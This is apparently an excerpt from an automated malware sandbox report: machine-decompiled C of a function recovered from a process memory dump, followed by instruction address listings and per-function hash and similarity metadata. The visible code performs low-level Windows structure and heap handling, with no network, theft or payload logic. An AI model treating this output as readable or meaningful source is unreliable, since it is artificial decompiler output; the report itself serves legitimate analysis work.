														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00C0F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00C0F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00C0F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00C0FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00C0FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00C0F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00C0F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00C94CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00C1D130(_t427, _t494, _t511);
				}
			}










































































                                                                                        0x00c95ba5
                                                                                        0x00c95baa
                                                                                        0x00c95baf
                                                                                        0x00c95bb4
                                                                                        0x00c95bb6
                                                                                        0x00c95bbc
                                                                                        0x00c95bbe
                                                                                        0x00c95bc4
                                                                                        0x00c95bcd
                                                                                        0x00c95bd3
                                                                                        0x00c95bd6
                                                                                        0x00c95bdc
                                                                                        0x00c95be0
                                                                                        0x00c95be3
                                                                                        0x00c95beb
                                                                                        0x00c95bf2
                                                                                        0x00c95bf8
                                                                                        0x00c95bfe
                                                                                        0x00c95c04
                                                                                        0x00c95c0e
                                                                                        0x00c95c18
                                                                                        0x00c95c1f
                                                                                        0x00c95c25
                                                                                        0x00c95c2a
                                                                                        0x00c95c2c
                                                                                        0x00c95c32
                                                                                        0x00c95c3a
                                                                                        0x00c95c3f
                                                                                        0x00c95c42
                                                                                        0x00c95c48
                                                                                        0x00c95c5b
                                                                                        0x00c95c5b
                                                                                        0x00c95c2c
                                                                                        0x00c95cb7
                                                                                        0x00c95cb9
                                                                                        0x00c95cbf
                                                                                        0x00c95cc2
                                                                                        0x00c95cca
                                                                                        0x00c95ccb
                                                                                        0x00c95ccb
                                                                                        0x00c95cd1
                                                                                        0x00c95cd7
                                                                                        0x00c95cda
                                                                                        0x00c95ce1
                                                                                        0x00c95ce4
                                                                                        0x00c95ce7
                                                                                        0x00c95ced
                                                                                        0x00c95cf3
                                                                                        0x00c95cf9
                                                                                        0x00c95cff
                                                                                        0x00c95d08
                                                                                        0x00c95d0a
                                                                                        0x00c95d0e
                                                                                        0x00c95d10
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d16
                                                                                        0x00c95d1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d20
                                                                                        0x00c95d22
                                                                                        0x00c95d25
                                                                                        0x00c95d2f
                                                                                        0x00c95d2f
                                                                                        0x00c95d33
                                                                                        0x00c95d3d
                                                                                        0x00c95d49
                                                                                        0x00c95d4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d5a
                                                                                        0x00c95d5d
                                                                                        0x00c95d60
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d66
                                                                                        0x00c95d69
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d6f
                                                                                        0x00c95d6f
                                                                                        0x00c95d73
                                                                                        0x00c95d79
                                                                                        0x00c95d7f
                                                                                        0x00c95d86
                                                                                        0x00c95d95
                                                                                        0x00c95d98
                                                                                        0x00c95dba
                                                                                        0x00c95dcb
                                                                                        0x00c95dce
                                                                                        0x00c95dd3
                                                                                        0x00c95dd6
                                                                                        0x00c95dd8
                                                                                        0x00c95de6
                                                                                        0x00c95dec
                                                                                        0x00c95dee
                                                                                        0x00c95df1
                                                                                        0x00c95df3
                                                                                        0x00c9635a
                                                                                        0x00c9635a
                                                                                        0x00000000
                                                                                        0x00c9635a
                                                                                        0x00c95dfe
                                                                                        0x00c95e02
                                                                                        0x00c95e05
                                                                                        0x00c95e07
                                                                                        0x00c95e10
                                                                                        0x00c95e13
                                                                                        0x00c95e1b
                                                                                        0x00c95e1c
                                                                                        0x00c95e21
                                                                                        0x00c95e22
                                                                                        0x00c95e23
                                                                                        0x00c95e25
                                                                                        0x00c95e2a
                                                                                        0x00c95e2c
                                                                                        0x00c95e2e
                                                                                        0x00c95e36
                                                                                        0x00c95e39
                                                                                        0x00c95e42
                                                                                        0x00c95e47
                                                                                        0x00c95e4d
                                                                                        0x00c95e54
                                                                                        0x00c95e54
                                                                                        0x00c95e54
                                                                                        0x00c95e2e
                                                                                        0x00c95e5c
                                                                                        0x00c95e5f
                                                                                        0x00c95e62
                                                                                        0x00c95e64
                                                                                        0x00c95e6b
                                                                                        0x00c95e70
                                                                                        0x00c95e7a
                                                                                        0x00c95e7a
                                                                                        0x00c95e7a
                                                                                        0x00c95e6b
                                                                                        0x00c95e7e
                                                                                        0x00c95e7f
                                                                                        0x00c95e7f
                                                                                        0x00c95e81
                                                                                        0x00c95e87
                                                                                        0x00c95e8b
                                                                                        0x00c95e8c
                                                                                        0x00c95e8c
                                                                                        0x00c95e8c
                                                                                        0x00c95e9a
                                                                                        0x00c95e9c
                                                                                        0x00c95ea2
                                                                                        0x00c95ea6
                                                                                        0x00c95f50
                                                                                        0x00c95f50
                                                                                        0x00c95f57
                                                                                        0x00c95f66
                                                                                        0x00c95f66
                                                                                        0x00c95f66
                                                                                        0x00c95f68
                                                                                        0x00c95f6a
                                                                                        0x00c963d0
                                                                                        0x00000000
                                                                                        0x00c95f70
                                                                                        0x00c95f70
                                                                                        0x00c95f91
                                                                                        0x00c95f9c
                                                                                        0x00c95f9e
                                                                                        0x00c95fa4
                                                                                        0x00c95fa6
                                                                                        0x00c9638c
                                                                                        0x00c96392
                                                                                        0x00c963a1
                                                                                        0x00c963a7
                                                                                        0x00c963af
                                                                                        0x00c963af
                                                                                        0x00c963bd
                                                                                        0x00c963d8
                                                                                        0x00000000
                                                                                        0x00c963d8
                                                                                        0x00c95fac
                                                                                        0x00c95fb2
                                                                                        0x00c95fb4
                                                                                        0x00c95fbd
                                                                                        0x00c95fc6
                                                                                        0x00c95fce
                                                                                        0x00c95fd4
                                                                                        0x00c95fdc
                                                                                        0x00c95fec
                                                                                        0x00c95fed
                                                                                        0x00c95fee
                                                                                        0x00c95fef
                                                                                        0x00c95ff9
                                                                                        0x00c95ffa
                                                                                        0x00c95ffb
                                                                                        0x00c95ffc
                                                                                        0x00c96000
                                                                                        0x00c96004
                                                                                        0x00c96012
                                                                                        0x00c96012
                                                                                        0x00c96018
                                                                                        0x00c96019
                                                                                        0x00c9601a
                                                                                        0x00c9601b
                                                                                        0x00c9601c
                                                                                        0x00c96020
                                                                                        0x00c96059
                                                                                        0x00c9605c
                                                                                        0x00c96061
                                                                                        0x00c96061
                                                                                        0x00c96022
                                                                                        0x00c96022
                                                                                        0x00c96022
                                                                                        0x00c96025
                                                                                        0x00c9602a
                                                                                        0x00c9602b
                                                                                        0x00c96031
                                                                                        0x00c96037
                                                                                        0x00c96038
                                                                                        0x00c9603e
                                                                                        0x00c96048
                                                                                        0x00c96049
                                                                                        0x00c9604a
                                                                                        0x00c9604b
                                                                                        0x00c9604c
                                                                                        0x00c9604d
                                                                                        0x00c96053
                                                                                        0x00c96054
                                                                                        0x00c96054
                                                                                        0x00c96062
                                                                                        0x00c96065
                                                                                        0x00c96067
                                                                                        0x00c9606a
                                                                                        0x00c96070
                                                                                        0x00c96075
                                                                                        0x00c96076
                                                                                        0x00c96081
                                                                                        0x00c96087
                                                                                        0x00c96095
                                                                                        0x00c96099
                                                                                        0x00c9609e
                                                                                        0x00c960a4
                                                                                        0x00c960ae
                                                                                        0x00c960b0
                                                                                        0x00c960b3
                                                                                        0x00c960b6
                                                                                        0x00c960b8
                                                                                        0x00c960ba
                                                                                        0x00c960ba
                                                                                        0x00c960ba
                                                                                        0x00c960ba
                                                                                        0x00c960be
                                                                                        0x00c960c0
                                                                                        0x00c960c5
                                                                                        0x00c960c5
                                                                                        0x00c960c5
                                                                                        0x00c960c6
                                                                                        0x00c960cd
                                                                                        0x00c96114
                                                                                        0x00c960cf
                                                                                        0x00c960cf
                                                                                        0x00c960d4
                                                                                        0x00c960d5
                                                                                        0x00c960da
                                                                                        0x00c960db
                                                                                        0x00c960e1
                                                                                        0x00c960e2
                                                                                        0x00c960e8
                                                                                        0x00c960f8
                                                                                        0x00c960fd
                                                                                        0x00c960fe
                                                                                        0x00c96102
                                                                                        0x00c96104
                                                                                        0x00c96107
                                                                                        0x00c96109
                                                                                        0x00c9610b
                                                                                        0x00c9610b
                                                                                        0x00c9610b
                                                                                        0x00c9610b
                                                                                        0x00c9610f
                                                                                        0x00c9610f
                                                                                        0x00c96117
                                                                                        0x00c9611a
                                                                                        0x00c9611f
                                                                                        0x00c96125
                                                                                        0x00c96134
                                                                                        0x00c96139
                                                                                        0x00c9613f
                                                                                        0x00c96146
                                                                                        0x00c96148
                                                                                        0x00c9614b
                                                                                        0x00c9614d
                                                                                        0x00c9614f
                                                                                        0x00c9614f
                                                                                        0x00c9614f
                                                                                        0x00c9614f
                                                                                        0x00c96153
                                                                                        0x00c96159
                                                                                        0x00c96159
                                                                                        0x00c9615c
                                                                                        0x00c96163
                                                                                        0x00c96169
                                                                                        0x00c9616c
                                                                                        0x00c96172
                                                                                        0x00c96181
                                                                                        0x00c96186
                                                                                        0x00c96187
                                                                                        0x00c9618b
                                                                                        0x00c96191
                                                                                        0x00c96195
                                                                                        0x00c961a3
                                                                                        0x00c961bb
                                                                                        0x00c961c0
                                                                                        0x00c961c3
                                                                                        0x00c961cc
                                                                                        0x00c961d0
                                                                                        0x00c961dc
                                                                                        0x00c961de
                                                                                        0x00c961e1
                                                                                        0x00c961e4
                                                                                        0x00c961e6
                                                                                        0x00c961e8
                                                                                        0x00c961e8
                                                                                        0x00c961e8
                                                                                        0x00c961e8
                                                                                        0x00c961e6
                                                                                        0x00c961ec
                                                                                        0x00c961f3
                                                                                        0x00c96203
                                                                                        0x00c96209
                                                                                        0x00c9620a
                                                                                        0x00c96216
                                                                                        0x00c9621d
                                                                                        0x00c96227
                                                                                        0x00c96241
                                                                                        0x00c96246
                                                                                        0x00c9624c
                                                                                        0x00c96257
                                                                                        0x00c96259
                                                                                        0x00c9625c
                                                                                        0x00c9625e
                                                                                        0x00c96260
                                                                                        0x00c96260
                                                                                        0x00c96260
                                                                                        0x00c96260
                                                                                        0x00c9625e
                                                                                        0x00c96264
                                                                                        0x00c96267
                                                                                        0x00c96269
                                                                                        0x00c96315
                                                                                        0x00c96315
                                                                                        0x00c9631b
                                                                                        0x00c9631e
                                                                                        0x00c96324
                                                                                        0x00c96327
                                                                                        0x00c9632f
                                                                                        0x00c96330
                                                                                        0x00c96333
                                                                                        0x00c9633a
                                                                                        0x00c9633c
                                                                                        0x00c96335
                                                                                        0x00c96335
                                                                                        0x00c96335
                                                                                        0x00c9633f
                                                                                        0x00c96342
                                                                                        0x00c9634c
                                                                                        0x00c96352
                                                                                        0x00c96355
                                                                                        0x00c96355
                                                                                        0x00c96359
                                                                                        0x00000000
                                                                                        0x00c9626f
                                                                                        0x00c96275
                                                                                        0x00c96275
                                                                                        0x00c96278
                                                                                        0x00c9627e
                                                                                        0x00c9627e
                                                                                        0x00c96281
                                                                                        0x00c96287
                                                                                        0x00c9628d
                                                                                        0x00c96298
                                                                                        0x00c9629c
                                                                                        0x00c962a2
                                                                                        0x00c9629e
                                                                                        0x00c9629e
                                                                                        0x00c9629e
                                                                                        0x00c962a7
                                                                                        0x00c962a7
                                                                                        0x00c962aa
                                                                                        0x00c962b0
                                                                                        0x00c962f0
                                                                                        0x00c962f0
                                                                                        0x00c962f2
                                                                                        0x00c962f8
                                                                                        0x00c962fd
                                                                                        0x00c962b2
                                                                                        0x00c962b2
                                                                                        0x00c962b2
                                                                                        0x00c962b5
                                                                                        0x00c962dd
                                                                                        0x00c962e2
                                                                                        0x00c962e5
                                                                                        0x00c962b7
                                                                                        0x00c962b8
                                                                                        0x00c962bb
                                                                                        0x00c962bd
                                                                                        0x00c962c0
                                                                                        0x00c962c4
                                                                                        0x00c962cd
                                                                                        0x00c962cd
                                                                                        0x00c962c0
                                                                                        0x00c962bb
                                                                                        0x00c962b5
                                                                                        0x00c96302
                                                                                        0x00c96303
                                                                                        0x00c96305
                                                                                        0x00c96305
                                                                                        0x00c96305
                                                                                        0x00c9630c
                                                                                        0x00c9630c
                                                                                        0x00000000
                                                                                        0x00c9627e
                                                                                        0x00c96269
                                                                                        0x00c95eac
                                                                                        0x00c95ebb
                                                                                        0x00c95ebe
                                                                                        0x00c95ecb
                                                                                        0x00c95ecb
                                                                                        0x00c95ece
                                                                                        0x00c95ece
                                                                                        0x00c95ed4
                                                                                        0x00c95ed7
                                                                                        0x00c95ed9
                                                                                        0x00c95edb
                                                                                        0x00c95edb
                                                                                        0x00c95ee1
                                                                                        0x00c95ee1
                                                                                        0x00c95ee3
                                                                                        0x00c95f20
                                                                                        0x00c95f20
                                                                                        0x00c95ee5
                                                                                        0x00c95ee5
                                                                                        0x00c95ee5
                                                                                        0x00c95ee8
                                                                                        0x00c95f11
                                                                                        0x00c95f18
                                                                                        0x00c95eea
                                                                                        0x00c95eea
                                                                                        0x00c95eed
                                                                                        0x00c95ef2
                                                                                        0x00c95ef8
                                                                                        0x00c95efb
                                                                                        0x00c95f0a
                                                                                        0x00c95f0a
                                                                                        0x00c95eed
                                                                                        0x00c95ee8
                                                                                        0x00c95f22
                                                                                        0x00c95f28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95f30
                                                                                        0x00c95f31
                                                                                        0x00c95f37
                                                                                        0x00c95f3a
                                                                                        0x00c95f3d
                                                                                        0x00c95f44
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95f46
                                                                                        0x00c95f48
                                                                                        0x00c95f4d
                                                                                        0x00000000
                                                                                        0x00c95f4d
                                                                                        0x00c95dda
                                                                                        0x00c95ddf
                                                                                        0x00000000
                                                                                        0x00c95ddf
                                                                                        0x00c95dd8
                                                                                        0x00c95da7
                                                                                        0x00c95da9
                                                                                        0x00c95dac
                                                                                        0x00c95dae
                                                                                        0x00000000
                                                                                        0x00c95db4
                                                                                        0x00c95db4
                                                                                        0x00000000
                                                                                        0x00c95db4
                                                                                        0x00c95dae
                                                                                        0x00c95d88
                                                                                        0x00c95d8d
                                                                                        0x00c96363
                                                                                        0x00c96369
                                                                                        0x00c9636a
                                                                                        0x00c96370
                                                                                        0x00c96372
                                                                                        0x00c9637a
                                                                                        0x00c9637b
                                                                                        0x00c9637d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c9637f
                                                                                        0x00c96385
                                                                                        0x00000000
                                                                                        0x00c96385
                                                                                        0x00c95d38
                                                                                        0x00c95d3b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c95d3b
                                                                                        0x00c95d27
                                                                                        0x00c95d29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c96360
                                                                                        0x00000000
                                                                                        0x00c96360
                                                                                        0x00c95c10
                                                                                        0x00c95c10
                                                                                        0x00c963da
                                                                                        0x00c963e5
                                                                                        0x00c963e5

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b2569b22664bd55345554d72d1e41d4e4892fe579df18d146d255f9edd69d69
                                                                                        • Instruction ID: debc4b6b988a421c05213d86d5c38a46fbec07e6f8d53cc5efc949af6f3bc6e4
                                                                                        • Opcode Fuzzy Hash: 0b2569b22664bd55345554d72d1e41d4e4892fe579df18d146d255f9edd69d69
                                                                                        • Instruction Fuzzy Hash: 09426971E00629CFDF24CF68C885BA9B7B1FF49304F1481AAD95DAB292D7349A85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE4120, Relevance: .4, Instructions: 444COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29ee35ab0e11bf8d727f49a83da9591ab16ce920c592ced179c6234e3659ea35
                                                                                        • Instruction ID: d6f63a5dd7dd92d58cb1fe1c5b2467396a3d9b0feb5de7df8e2c074eb90b562a
                                                                                        • Opcode Fuzzy Hash: 29ee35ab0e11bf8d727f49a83da9591ab16ce920c592ced179c6234e3659ea35
                                                                                        • Instruction Fuzzy Hash: 58F179706082918BC724CF1AC480A3AB7E1EF98704F1449AEF896DB791EB34D991DB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF20A0, Relevance: .4, Instructions: 420COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5493987d27f0e23c90fdc68223ad90b5097dca5f085205bad18456aa813c9a28
                                                                                        • Instruction ID: 65cb7d907c5f9fd1af448cf88c230cb8fd396cec6580276f3340d49fa81c9dad
                                                                                        • Opcode Fuzzy Hash: 5493987d27f0e23c90fdc68223ad90b5097dca5f085205bad18456aa813c9a28
                                                                                        • Instruction Fuzzy Hash: 25F14271A087459FDB25CF28C88077A77E5EF84320F1885ADFAA59B280D734DD49CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD849B, Relevance: .3, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec7d769dd34204dde02789578bde0fb5733d937d661ea249ec00e7587359e7a2
                                                                                        • Instruction ID: 7db453b4e0537a8ac50a0354b4397c9bb0f215802564df1184b6afdfe3d42893
                                                                                        • Opcode Fuzzy Hash: ec7d769dd34204dde02789578bde0fb5733d937d661ea249ec00e7587359e7a2
                                                                                        • Instruction Fuzzy Hash: 33B14770E04219DBDB28CF99D984AADFBF9FF48304F20416AE405AB751EB70AD45CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF513A, Relevance: .3, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d387f974e28a01c32a778ff349390cb9129ee3160a29556159d4473b6a9eddfc
                                                                                        • Instruction ID: 87dbbe257902f8942bea093b3f0292beba4387679bb5e674adeea9372ce491d4
                                                                                        • Opcode Fuzzy Hash: d387f974e28a01c32a778ff349390cb9129ee3160a29556159d4473b6a9eddfc
                                                                                        • Instruction Fuzzy Hash: 15C112755087809FD364CF28C580A6AFBF1BF88304F148AAEF9998B352D771E945CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF03E2, Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
